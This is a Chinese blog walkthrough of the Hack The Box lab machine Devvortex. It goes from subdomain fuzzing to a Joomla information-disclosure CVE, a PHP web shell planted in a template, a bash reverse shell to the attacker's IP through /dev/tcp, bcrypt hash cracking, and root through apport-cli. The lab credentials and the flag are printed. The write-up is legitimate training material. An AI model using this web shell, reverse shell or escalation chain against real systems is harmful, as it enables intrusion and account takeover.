Eur3ka's Studio.

Devvortex

HTB
2025/09/15
loading

真是忙里偷闲的日子呀 刷题记录 学到了一个不常见的CMS架构

Recon

对于开放的端口而言 并没有太多值得需要关注的地方 又是网站服务80端口起手

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
❯ nmap -sCV -p22,80 10.10.11.242
Starting Nmap 7.98 ( https://nmap.org ) at 2025-09-15 23:38 +0800
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.34s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.91 seconds

进入web服务之后 并不能找到合适的攻击点 下方的输入框也没有什么头绪 下一步还是HTB提供的思路去寻找子域名 也是学到了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
❯ proxychains ffuf -w subdomains-1000.txt -u http://10.10.11.242 -H 'Host: FUZZ.devvortex.htb'
[proxychains] config file found: /Users/joe/proxychains-ng/proxychains.conf
[proxychains] preloading /Users/joe/proxychains-ng/libproxychains4.dylib
[proxychains] DLL init: proxychains-ng 4.17-git-4-gce07eaa

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.242
 :: Wordlist         : FUZZ: /Users/joe/Documents/Red/SecDictionary/Subdomain_List/subdomains-1000.txt
 :: Header           : Host: FUZZ.devvortex.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 601ms]

发现以dev开头的子域名 加入hosts以访问

1
10.10.11.242 devvortex.htb dev.devvortex.htb

成功访问之后发现页脚里和源代码里都没有写到对应的框架信息(至少我没找到) 遂使用CmsVulScan扫描一下框架信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
❯ python3 CmsVulScan.py -u http://dev.devvortex.htb

  _____        _   __     ______
 / ___/_ _  __| | / /_ __/ / __/______ ____
/ /__/  ' \(_-< |/ / // / /\ \/ __/ _ `/ _ \
\___/_/_/_/___/___/\_,_/_/___/\__/\_,_/_//_/



[00:22:07] [*] Check whether the payload file exists
[00:22:07] [*] All Payload 18780 duplicate removal 6935
[00:22:07] [+] Payload load the success
[00:22:07] [*] CMS recognition of http://dev.devvortex.htb in progress
[00:22:07] [*] Scanning by MD5 mode......
[00:24:17] [*] MD5: 3725/3725
[00:24:17] [*] Scanning by RE mode......
[00:24:19] [*] RE: 49/2868
[00:24:19] [+] Using RE to discover the CMS in path /administrator/components/com_login/login.xml: Joomla(逐浪)

确实是Joomla 那么接下来获取版本 直接访问/administrator在页脚也没有看到版本信息 那么去msfconsole看下

1
2
3
4
5
6
7
8
9
10
msf > search joomla
14  auxiliary/scanner/http/joomla_version
msf > use auxiliary/scanner/http/joomla_version
msf auxiliary(scanner/http/joomla_version) > set rhosts http://dev.devvortex.htb/
rhosts => http://dev.devvortex.htb/
msf auxiliary(scanner/http/joomla_version) > run
[*] Server: nginx/1.18.0 (Ubuntu)
[+] Joomla version: 4.2.6
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

成功获取该joomla版本为4.2.6

Shell as logan

CVE-2023-23752

既然知道了框架 那搜一下关于他的洞 发现没有4.2.6的 但是有个比他高一点的4.2.8 那就试一下好啦

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~]
└─$ searchsploit joomla | grep 4.2
Joomla! v4.2.8 - Unauthenticated information disclosure             | php/webapps/51334.py
┌──(kali㉿kali)-[~]
└─$ searchsploit -x php/webapps/51334.py

#!/usr/bin/env ruby

# Exploit
## Title: Joomla! v4.2.8 - Unauthenticated information disclosure
## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752
## Date: 2023-03-24
## Vendor Homepage: https://www.joomla.org/
## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz
## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)

发现确实是4.0.0到4.2.8都可以通用的漏洞 那么就用msfconsole着手吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf > use cve:2023-23752
msf auxiliary(scanner/http/joomla_api_improper_access_checks) > set rhosts http://dev.devvortex.htb/
rhosts => http://dev.devvortex.htb/
msf auxiliary(scanner/http/joomla_api_improper_access_checks) > run
[+] Users JSON saved to /Users/joe/.msf4/loot/20250916125947_default_10.10.11.242_joomla.users_856850.bin
[+] Joomla Users
============

 ID   Super User  Name        Username  Email       Send Email  Register D  Last Visit   Group Names
                                                                ate         Date
 --   ----------  ----        --------  -----       ----------  ----------  -----------  -----------
 649  *           lewis       lewis     lewis@devv  1           2023-09-25  2023-10-29   Super Users
                                        ortex.htb                16:44:24   16:18:50
 650              logan paul  logan     logan@devv  0           2023-09-26               Registered
                                        ortex.htb                19:15:42

[+] Config JSON saved to /Users/joe/.msf4/loot/20250916125948_default_10.10.11.242_joomla.config_972795.bin
[+] Joomla Config
=============

 Setting        Value
 -------        -----
 db encryption  0
 db host        localhost
 db name        joomla
 db password    P4ntherg0t1n5r3c0n##
 db prefix      sd4fg_
 db user        lewis
 dbtype         mysqli

可以正常打通获取信息 就是不知道为什么下面还是接了一连串的报错 尝试直接连接数据库发现是连不上的 可能没有开启远程连接 好在可以复用为登陆账号密码

Templates修改

进来之后一把梭的CVE应该是再没了 后来也是学习了一下joomla框架 发现System/Templates/Site Templates里面可以编辑框架模版 并且是实时更新的 那么看看能不能给他加点啥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php

/**
 * @package     Joomla.Site
 * @subpackage  Templates.cassiopeia
 *
 * @copyright   (C) 2017 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

if (isset($_REQUEST['hack'])){
  system($_REQUEST['hack']);
  die();
}
...

对index.php我们因为权限并不能修改 但是发现了error.php这个漏网之鱼 修改之后弹个shell

1
2
3
4
5
6
7
8
9
http://dev.devvortex.htb/hack?hack=bash -c "bash -i >%26 /dev/tcp/10.10.16.2/4444 0>%261"

❯ nc -lvn 4444
bash: cannot set terminal process group (871): Inappropriate ioctl for device
bash: no job control in this shell
www-data@devvortex:~/dev.devvortex.htb$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<tb$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@devvortex:~/dev.devvortex.htb$
//连接后使用python升级shell

Hashcat

连接之后发现home下只有logan用户 尝试使用之前的lewis/P4ntherg0t1n5r3c0n##用户密码无法ssh连接 后来想起来之前的数据库还没有连接过 尝试使用mysql连接数据库

1
2
3
4
5
6
www-data@devvortex:~/dev.devvortex.htb$ mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla
<htb$ mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla
...
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

ok成功连接上 就不开远程连接了 直接干terminal好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
mysql> describe sd4fg_users;
+---------------+---------------+------+-----+---------+----------------+
| Field         | Type          | Null | Key | Default | Extra          |
+---------------+---------------+------+-----+---------+----------------+
| id            | int           | NO   | PRI | NULL    | auto_increment |
| name          | varchar(400)  | NO   | MUL |         |                |
| username      | varchar(150)  | NO   | UNI |         |                |
| email         | varchar(100)  | NO   | MUL |         |                |
| password      | varchar(100)  | NO   |     |         |                |
| block         | tinyint       | NO   | MUL | 0       |                |
| sendEmail     | tinyint       | YES  |     | 0       |                |
| registerDate  | datetime      | NO   |     | NULL    |                |
| lastvisitDate | datetime      | YES  |     | NULL    |                |
| activation    | varchar(100)  | NO   |     |         |                |
| params        | text          | NO   |     | NULL    |                |
| lastResetTime | datetime      | YES  |     | NULL    |                |
| resetCount    | int           | NO   |     | 0       |                |
| otpKey        | varchar(1000) | NO   |     |         |                |
| otep          | varchar(1000) | NO   |     |         |                |
| requireReset  | tinyint       | NO   |     | 0       |                |
| authProvider  | varchar(100)  | NO   |     |         |                |
+---------------+---------------+------+-----+---------+----------------+
17 rows in set (0.01 sec)

mysql> select name,username,password from sd4fg_users;
+------------+----------+--------------------------------------------------------------+
| name       | username | password                                                     |
+------------+----------+--------------------------------------------------------------+
| lewis      | lewis    | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan paul | logan    | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+------------+----------+--------------------------------------------------------------+
2 rows in set (0.00 sec)

这条logan paul的记录比较有意思 应该可以复用于ssh连接了 现在首要是撞出哈希

1
2
3
❯ hashcat logan ../Documents/Red/SecDictionary/PasswordDic/弱口令字典/rockyou-top15000.txt --user -m 3200
···
$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho

当然反过来去撞lewis的密码也是可以的

1
2
3
4
5
❯ cat sqlpass
P4ntherg0t1n5r3c0n##
❯ hashcat logan  sqlpass --user -m 3200
...
$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u:P4ntherg0t1n5r3c0n##

ok那就用logan:tequieromucho进行ssh登陆 成功拿到user.txt

1
2
3
4
❯ ssh logan@10.10.11.242
...
logan@devvortex:~$ cat /home/logan/user.txt
7255c0f90e316ba7041e99fa4732413c

Shell as root

使用sudo -l之后发现可以用SUID提权 发现可以利用CVE-2023-1326

1
2
3
4
5
6
7
8
logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

apport为处理崩溃程序 若还没崩溃文件那可以先制造一个

1
2
3
4
5
6
logan@devvortex:/var/crash$ sleep 20 &
[1] 2761
logan@devvortex:/var/crash$ kill -ABRT 2761
logan@devvortex:/var/crash$ ls
_usr_bin_sleep.1000.crash
[1]+  Aborted                 (core dumped) sleep 20

获得到崩溃文件之后 就可以进行SUID啦

1
2
3
4
5
logan@devvortex: sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
press V (view report)
!/bin/bash(直接输入 不用管屏幕显示的什么)


Author:Xu Haoxiang

Link:http://dawoxiansigema.github.io/2025/09/15/Devvortex/

Publish date:September 15th 2025, 11:35:23 pm

Update date:September 18th 2025, 10:34:44 am

License:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. Recon
  2. 2. Shell as logan
    1. 2.1. CVE-2023-23752
    2. 2.2. Templates修改
    3. 2.3. Hashcat
  3. 3. Shell as root
Total : 5
2025
HTB 工具 提权